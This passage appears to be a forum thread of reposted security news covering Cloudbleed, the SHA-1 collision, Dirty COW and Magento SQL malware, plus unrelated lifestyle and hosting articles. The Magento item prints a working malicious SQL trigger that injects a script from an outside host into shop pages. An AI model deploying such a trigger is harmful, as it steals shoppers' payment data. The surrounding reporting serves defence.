when the code jumps to st1266 p is incremented and is now past pe. It then won’t jump to _test_eof1266 (where EOF checking would have been performed) and will carry on past the end of the buffer trying to parse the HTML document. So, the bug had been dormant for years until the internal feng shui of the buffers passed between NGINX filter modules changed with the introduction of cf-html. Going bug hunting Research by IBM in the 1960s and 1970s showed that bugs tend to cluster in what became known as “error-prone modules”. Since we’d identified a nasty pointer overrun in the code generated by Ragel it was prudent to go hunting for other bugs. Part of the infosec team started fuzzing the generated code to look for other possible pointer overruns. Another team built test cases from malformed web pages found in the wild. A software engineering team began a manual inspection of the generated code looking for problems. At that point it was decided to add explicit pointer checks to every pointer access in the generated code to prevent any future problem and to log any errors seen in the wild. The errors generated were fed to our global error logging infrastructure for analysis and trending. #define SAFE_CHAR ({\ if (!__builtin_expect(p < pe, 1)) {\ ngx_log_error(NGX_LOG_CRIT, r->connection->log, 0, "email filter tried to access char past EOF");\ RESET();\ output_flat_saved(r, ctx);\ BUF_STATE(output);\ return NGX_ERROR;\ }\ *p;\ }) And we began seeing log lines like this: 2017/02/19 13:47:34 [crit] 27558#0: *2 email filter tried to access char past EOF while sending response to client, client: 127.0.0.1, server: localhost, request: "GET /malformed-test.html HTTP/1.1” Every log line indicates an HTTP request that could have leaked private memory. By logging how often the problem was occurring we hoped to get an estimate of the number of times HTTP request had leaked memory while the bug was present. In order for the memory to leak the following had to be true: The final buffer containing data had to finish with a malformed script or img tag The buffer had to be less than 4k in length (otherwise NGINX would crash) The customer had to either have Email Obfuscation enabled (because it uses both the old and new parsers as we transition), … or Automatic HTTPS Rewrites/Server Side Excludes (which use the new parser) in combination with another Cloudflare feature that uses the old parser. … and Server-Side Excludes only execute if the client IP has a poor reputation (i.e. it does not work for most visitors). That explains why the buffer overrun resulting in a leak of memory occurred so infrequently. Additionally, the Email Obfuscation feature (which uses both parsers and would have enabled the bug to happen on the most Cloudflare sites) was only enabled on February 13 (four days before Tavis’ report). The three features implicated were rolled out as follows. The earliest date memory could have leaked is 2016-09-22. 2016-09-22 Automatic HTTP Rewrites enabled 2017-01-30 Server-Side Excludes migrated to new parser 2017-02-13 Email Obfuscation partially migrated to new parser 2017-02-18 Google reports problem to Cloudflare and leak is stopped The greatest potential impact occurred for four days starting on February 13 because Automatic HTTP Rewrites wasn’t widely used and Server-Side Excludes only activate for malicious IP addresses. Internal impact of the bug Cloudflare runs multiple separate processes on the edge machines and these provide process and memory isolation. The memory being leaked was from a process based on NGINX that does HTTP handling. It has a separate heap from processes doing SSL, image re-compression, and caching, which meant that we were quickly able to determine that SSL private keys belonging to our customers could not have been leaked. However, the memory space being leaked did still contain sensitive information. One obvious piece of information that had leaked was a private key used to secure connections between Cloudflare machines. When processing HTTP requests for customers’ web sites our edge machines talk to each other within a rack, within a data center, and between data centers for logging, caching, and to retrieve web pages from origin web servers. In response to heightened concerns about surveillance activities against Internet companies, we decided in 2013 to encrypt all connections between Cloudflare machines to prevent such an attack even if the machines were sitting in the same rack. The private key leaked was the one used for this machine to machine encryption. There were also a small number of secrets used internally at Cloudflare for authentication present. External impact and cache clearing More concerning was that fact that chunks of in-flight HTTP requests for Cloudflare customers were present in the dumped memory. That meant that information that should have been private could be disclosed. This included HTTP headers, chunks of POST data (perhaps containing passwords), JSON for API calls, URI parameters, cookies and other sensitive information used for authentication (such as API keys and OAuth tokens). Because Cloudflare operates a large, shared infrastructure an HTTP request to a Cloudflare web site that was vulnerable to this problem could reveal information about an unrelated other Cloudflare site. An additional problem was that Google (and other search engines) had cached some of the leaked memory through their normal crawling and caching processes. We wanted to ensure that this memory was scrubbed from search engine caches before the public disclosure of the problem so that third-parties would not be able to go hunting for sensitive information. Our natural inclination was to get news of the bug out as quickly as possible, but we felt we had a duty of care to ensure that search engine caches were scrubbed before a public announcement. The infosec team worked to identify URIs in search engine caches that had leaked memory and get them purged. With the help of Google, Yahoo, Bing and others, we found 770 unique URIs that had been cached and which contained leaked memory. Those 770 unique URIs covered 161 unique domains. The leaked memory has been purged with the help of the search engines. We also undertook other search expeditions looking for potentially leaked information on sites like Pastebin and did not find anything. Some lessons The engineers working on the new HTML parser had been so worried about bugs affecting our service that they had spent hours verifying that it did not contain security problems. Unfortunately, it was the ancient piece of software that contained a latent security problem and that problem only showed up as we were in the process of migrating away from it. Our internal infosec team is now undertaking a project to fuzz older software looking for potential other security problems. Detailed Timeline We are very grateful to our colleagues at Google for contacting us about the problem and working closely with us through its resolution. All of which occurred without any reports that outside parties had identified the issue or exploited it. All times are UTC. 2017-02-18 0011 Tweet from Tavis Ormandy asking for Cloudflare contact information 2017-02-18 0032 Cloudflare receives details of bug from Google 2017-02-18 0040 Cross functional team assembles in San Francisco 2017-02-18 0119 Email Obfuscation disabled worldwide 2017-02-18 0122 London team joins 2017-02-18 0424 Automatic HTTPS Rewrites disabled worldwide 2017-02-18 0722 Patch implementing kill switch for cf-html parser deployed worldwide 2017-02-20 2159 SAFE_CHAR fix deployed globally 2017-02-21 1803 Automatic HTTPS Rewrites, Server-Side Excludes and Email Obfuscation re-enabled worldwide NOTE: This post was updated to reflect updated information. https://blog.cloudflare.com/incident-report-on-memory-leak-caused-by-cloudflare-parser-bug/
  20. Back in the old days, “going online” meant calling up with your modem at 300 bits per second and interacting slowly with a basic command prompt (sometimes BASIC in the literal sense). Noise on the line and other electrical interference could easily turn zeros into ones and vice versa, causing corruption in your session, such as BANANA turned into BANAMA, MANGO into MaNGO, or evenONLINE into +++ATZ. A common way to spot obvious errors automatically was by using a checksum, quite literally calculated by checking the sum of all the numeric values of every byte in the message. Checksums were used because they were quick to calculate, as far back as the 1960s and 1970s, because even the most underpowered processors usually had an ADD or ACCUMULATE instruction that could efficiently maintain a running total of this sort. But checksums were error prone. If you swap round any of the bytes in a message, the checksum remains unchanged because A+B = B+A. Likewise, two errors can easily cancel out, for example if BANANA gets corrupted into CANAMA, because (A+1) + (B-1) = A+B. Enter the CRC CRCs, short for cyclic redundancy checks, were a better solution, using a comparatively simple series of bit-shifts and XOR operations to maintain a bigger accumulator that wasn’t so easily fooled by double errors or swapped bytes. CRC-32 produces a 32-bit (4-byte) checksum – today, the term checksum is used metaphorically, not literally to mean that the bytes were added together – designed to do a much better job of detecting accidental errors such as those caused by mistyping or by modem corruption. But CRCs aren’t any good against deliberate errors. That’s because CRCs are based on a process involving a form of long division, making the algorithm predictable, so the output can be tweaked to be whatever you like by tweaking the input slightly in a way that can be calculated automatically. That makes it trivial to create a message with any checksum you like, for example so that its checksum matches an earlier message in order to create confusion, commit fraud, or worse. Note that there are only 4 billion (232) different possible CRC-32 values, so that at modern computer speeds you could forge a CRC-32 without any arithmetical trickery by brute force, simply by making billions of random modifications to the message until you hit paydirt. But even if you extend your CRC to 64 bits, 128 bits or even more to make accidental duplicates as good as impossible, it’s still easy to calculate forgeries very quickly, with no need to rely on brute force. Moving up to cryptographic hashes For security-related purposes, you need what’s commonly referred to as a cryptographic checksum orcryptographic hash. This sort of algorithm is designed not only to detect accidental errors, but also to be “untrickable” enough to prevent deliberate errors. In particular, a cryptographic hash, denoted here as a mathematical function H(), should have at least these characteristics: If you deliberately create two messages M1 and M2 (any two messages; you get to choose both of them) such that H(M1) = H(M2), you have a collision, so that H has failed as a digital fingerprint. Therefore you should not be able to construct a collision, other than by trying over and over with different inputs until you hit the jackpot by chance. If you know that H(M) = X, but you don’t know my message M, then you should not be able to “go backwards” from X to M, other than by trying different messages over and over until you hit the jackpot by chance. If I choose M and tell you what it is, so you can compute H(M) = X for yourself, you should not be able to come up with a different message M’ that also has H(M’) = X, other than by guesswork. (This is much tougher than case 1 because you don’t get to choose any matching pair of hashes from a giant pool of messages. You have to match my hash, not anyhash, which squares the effort needed.) For many years, an algorithm called MD5 was widely used because it claimed to provide these three protections against abuse, but it is now forbidden in the cryptographic world because it is known to fail on Promise One above. Once a hashing algorithm fails in respect of Promise One, it’s prudent to assume it won’t meet its other design goals either, even if it seems to be holding out on the other two promises. MD5 collisions are easy to generate on purpose, so the algorithm can no longer be trusted. SHA-1 replaces MD5 SHA-1 was the next-most-complex hash after MD5, and was widely used as a replacement when MD5 fell out of favour. Greatly oversimplified, the SHA-1 algorithm consumes its input in blocks of sixteen 32-bit words (512 bits, or 64 bytes), mixing each block into a cumulative hash of five 32-bit words (160 bits, or 20 bytes). for block in blocks() do for i = 17 to 80 do -- each step here extends the original 16-word input -- block to 80 words by adding one word made by mixing -- together four of the previous sixteen words. block[i] = minimixtogether(block,i) end for i = 1 to 80 do -- each step here mixes one of the words from the 80-word -- "extended block" into the five-byte hash accumulator hash = giantmixtogether(block,i) end end The giantmixtogether() function that scrambles the extended input into the hash uses a range of different operations, including NOT, AND, OR, XOR, ADD and ROL (rotate left); the minimixtogether()function used to massage the input data uses XOR and ROL. The algorithm certainly looks complicated, and at first glance you would assume that it mixes-minces-shreds-and-liquidises its input more than well enough to be “untrickable”. Indeed, the complexity of SHA-1 was considered sufficient to immunise it against the weaknesses in the similar but simpler MD5 algorithm. At the same time, SHA-1 was not so much more complicated han MD5 that it would run too slowly to be a convenient replacement. SHA-1 considered harmful For years, however, experts have been telling everyone to stop using SHA-1, and to use more complex hash algorithms such as SHA-2 and SHA-3 instead, predicting that the first actual real-world, in-your-face chink in SHA-1’s armour would turn up soon. Google’s Chrome browser, for example, stopped accepting web site certificates with SHA-1 hashes at the start of 2017, considering them no longer safe enough. The Mozilla Firefox browser will soon follow suit. The reason is simple: as soon as someone actually turns theory into reality, and produces a hash collision, you can no longer rely on saying, “She’ll be right for a while yet,” because your “while yet” period just expired. So it’s a good idea to get ahead of the game and to abandon creaky cryptographic code before it goes “Bang!” Even if a collision takes an enormous amount of work – imagine that you’d need 110 top-end graphics cards running flat out for a whole year, for example – the first actual collision would be what you might call the digital disproof of the pudding. The digital disproof So, to cut what has become a long story short, you need to know that researchers from Google and the CWI Institute in Amsterdam… …have just disproved the pudding. Bang! A hash collision that in theory should have taken them thousands of years to stumble upon by chance has been created on purpose within all of our lifetimes – and that should simply never have happened. Apparently, they did indeed need 110 top-end graphics cards running for a whole year, but that is still 100,000 times faster than the design goals (and the theoretical strength) of SHA-1, making SHA-1 a risky proposition for evermore. TL;DR: SHA-1 really is broken, so use a stronger hash from now on, because cryptographic attacks only ever get faster. https://nakedsecurity.sophos.com/2017/02/23/bang-sha-1-collides-at-38762cf7f55934b34d179ae6a4c80cadccbb7f0a/
  21. https://dirtycow.ninja/
  22. Dirty COW (Dirty copy-on-write) is a computer security vulnerability for the Linux kernel that affects all Linux-based operating systems including Android. It is a local privilege escalation bug that exploits a race condition in the implementation of the copy-on-write mechanism in the kernel's memory-management subsystem. The vulnerability was discovered by Phil Oester. Because of the race condition, with the right timing, a local attacker can exploit the copy-on-write mechanism to turn a read-only mapping of a file into a writable mapping. Although it is a local privilege escalation bug, remote attackers can use it in conjunction with other exploits that allow remote execution of non-privileged code to achieve remote root access on a computer.[1] The attack itself does not leave traces in the system log. The vulnerability has the CVE designation CVE-2016-5195. The Debian operating system distribution has announced that it has released a patch for the vulnerability . Dirty Cow was one of the first security issues transparently fixed in Ubuntu by the Canonical Live Patch service. It has been demonstrated that the bug can be utilized to root any Android device up to Android version 7 History The bug has been lurking in the Linux kernel since version 2.6.22 released in September 2007, and there is information about been actively exploited at least since October 2016.[2] The bug has been patched in Linux kernel versions 4.8.3, 4.7.9, 4.4.26 and newer. Applications The Dirty COW vulnerability has many perceived use cases including proven examples, such as obtaining root permissions in Android devices, as well as several speculated implementations. There are many binaries used in linux which are read-only, and can only be modified or written to by a user of higher permissions, such as the root. When privileges are escalated, whether by genuine or ingenuine means – such as by using the Dirty COW exploit – the user can modify, usually unmodifiable binaries and files. If a malicious individual could use the Dirty COW vulnerability to escalate their permissions, they could change a file, such as /bin/bash, so that it performs an additional, unexpected functions, such as a keylogger. When a standard user uses /bin/bash, they will not know that they are actually providing their passwords and activity to a malicious third-party. Remedies and recourse At the dawn of its discovery, anyone using a machine running Linux was susceptible to the exploit. The only perfect cure to this exploit is a patch or running a newer version which is not vulnerable anymore. Linus Torvalds committed a patch on 18/10/2016 acknowledging that it was an ancient bug that was actually attempted to be fixed once eleven years ago. Some distributors provide patches, such as Canonical, who provide a live patch. In the absence of a patch, there are a few mitigation technologies including STAP, and very little security from SELinux or AppArmor. Antivirus software has the potential to detect elevated permissions attacks, but it cannot prevent the attack. When given the opportunity, the safest route is to upgrade the Linux kernel to the following versions Earliest kernel version fixed Linux OS that uses this 3.2.0-113.155 Ubuntu 12.04 LTS 3.13.0-100.147 Ubuntu 14.04 LTS (Linux Mint 17.1) 3.16.36-1+deb8u2 Debian 8 4.4.0-45.66 Ubuntu 16.04 LTS 4.7.8-1 Debian unstable 4.8.0-26.28 Ubuntu 16.10 https://en.wikipedia.org/wiki/Dirty_COW
  23. 10 Illustrations That Show Just How Much the Internet Has Changed Our Lives None of us should ever succumb to panic — real life is definitely still out there despite the huge role that the Internet plays in modern life. Gadgets and technology play a part in our lives, but it really is just a part. Nevertheless, it’s funny to think about the hundreds of little ways these things have changed our behavior. Here are 10 of the ones we at Bright Side have noticed. How many do you recognize? Illustrator: Astkhik Rakimova exclusively for Bright Side Preview photo credit Laughing Colours
  24. Security experts have discovered a new SQL malware targeting online shops running on Magento that hides the code in the website’s database. Security experts have discovered a new strain of malware that is targeted websites raising Russian the Magento eCommerce platform. The novelty is that this is the first a malware that hides the code in the website’s database is completely written in SQL. The malware is triggered every time a user places a new order, the “SQL trigger” is then executed before the Magento platform even assembles the web page. The researchers Willem de Groot that first analyzed the SQL malware discovered by Jeroen Boersma explained that this is a significant evolution on the threat landscape. “The trigger is executed every time a new order is made. The query checks for the existence of the malware in the header, footer, copyright and every CMS block. If absent, it will re-add itself.” reads the blog post published by Willem de Groot. “This discovery shows we have entered a new phase of malware evolution. Just scanning files is not enough anymore, malware detection methods should now include database analysis.” The malware could be used to steal user payment card data belonging to the users of Magento eCommerce websites. In order to discover the presence of the SQL malware, administrators have to inspect the database searching for suspicious SQL triggers such as containing admin, .js, script or < (html tags). echo 'SHOW TRIGGERS' | n98-magerun db:console Once discovered the malicious trigger it is possible to delete it with a command like the following one: echo "DROP TRIGGER <trigger_name>" | n98-magerun db:console According to the expert, SQL malware attacks starts with a brute force attack on /rss/catalog/notifystock/ for an otherwise completely patched shop. Below the pattern discovered by Jeroen Boersma: TRIGGER `after_insert_order` AFTER INSERT ON `sales_flat_order` FOR EACH ROW BEGIN UPDATE core_config_data SET value = IF( value LIKE '%<script src="https://mage-storage.pw/cdn/flexible-min.js"></script>%', value, CONCAT(value, ' <script src="https://mage-storage.pw/cdn/flexible-min.js"></script>') ) WHERE path='design/head/includes' OR path='design/footer/absolute_footer' OR path='design/footer/copyright';\ UPDATE cms_block SET content= IF( content LIKE '%<script src="https://mage-storage.pw/cdn/flexible-min.js"></script>%', content, CONCAT(content, ' <script src="https://mage-storage.pw/cdn/flexible-min.js"></script>') ); END; de Groot has updated the Magereport and the Malware Scanner to detect this new type of malware. http://securityaffairs.co/wordpress/56373/malware/sql-malware.html
  25. Choosing a web hosting company is a big decision having many consequences. The hosting company greatly influences your website’s speed and reliability, causing your visitors to leave with either a good or bad impression. Whether you’re looking to host your very first site or want to move an existing site to a new provider, taking the time to think through each of the following items can help you feel confident that you have made the best decision that will meet your needs long into the future. Physical Hardware—Physical hardware running your site being one of the most important considerations, take the time to research the server types of a hosting company is using. Is high-speed SSD storage included? Does it use redundant devices, such as RAID-configured hard drives? What is its response time when replacing failed hardware and are backups onsite? Technical Support Team—No matter how good a host may be, it’s likely you’ll need to work with its support team at some point. Discover your comfort level when communicating with them upfront, as this may very well impact how quickly you arrive at issue resolution. Response Times & Contact Options—Some web hosts require that you work through their ticketing system. Others have a phone-in option, use live web chat, or want you to reach them via email. So what is the best way to get in touch with them? Is the team available 24/7 or only during certain hours? Reputation—In evaluating host contenders, reading reviews can help you make a more informed decision. A company I worked for (Hostadvice.com) is one of the resources you can use here—it’s a community of webmasters who share their experiences with different hosting providers to help find the most suitable option. Hosting Features—Beyond providing you a server(s) where you can load your site contents, some hosts include many features, others make them available as add-ons, and still others don’t offer any of them. These include: Disk storage and bandwidth limitations Software installation script library SSL certificates Website design tools and themes Daily backups and fee for restores (if any) Site migration SPAM protection Domain registration and privacy protection Acquaint yourself with each host’s feature list in determining those that best match your specific needs. Price of Hosting—Web host pricing is nowhere near uniform. Only by taking the time to comparatively shop will you finding a company that offers high quality hosting at a reasonable price. Determine accepted payment methods and look for discounts if you’re able to pay for service a year in advance. Control Panel —A control panel or portal is the interface you’ll use to manage your website once it’s live. Here you can do such tasks as perform a manual backup, reset your server (if allowed), or configure additional domains. Two of most popular control panel options are cPanel and Plesk. Choosing a host that offers one of these helps make site maintenance easier. Datacenter Geolocation—Having your site hosted at a datacenter that is geographically close to your target audience helps maximize site load speed experienced by your visitors.Having said that, organizations catering to a global audience should disregard this and consider using a content delivery network instead (see below), as it will replicate their website in multiple geolocations to improve performance. Content Delivery Network—If your site is likely to have high bandwidth requirements, serve large files, or have other significant demands, you’ll want a content delivery network (CDN) to serve up at least a portion of your content. A CDN enables your site to quickly and efficiently serve a very high number of customers—performance that isn’t always possible using traditional hosting options. The host should also make CDN integration easy for you. Website Security —In addition to other threats, distributed denial of service (DDoS) attacks are a frequent cyberattack form, with millions of sites being hit every day at a rate of tens, or even hundreds of gigs per second. Protection is a critical component for any website. Most web hosts offer basic security/firewall and DDoS protection, but the most effective threat mitigation available today involves routing all of your site traffic through a service that scrubs out nefarious traffic before it has an opportunity to wreak havoc with your content. Room for Growth—In starting a new website, perhaps you only need a simple, shared hosting account. But once it becomes a success, your hosting needs will likely grow commensurately. In looking ahead, then, you may want to use a hosting company that provides such expansion options as virtual private servers (VPSs), dedicated servers, cloud hosting, and more. https://www.incapsula.com/blog/choosing-web-host.html
×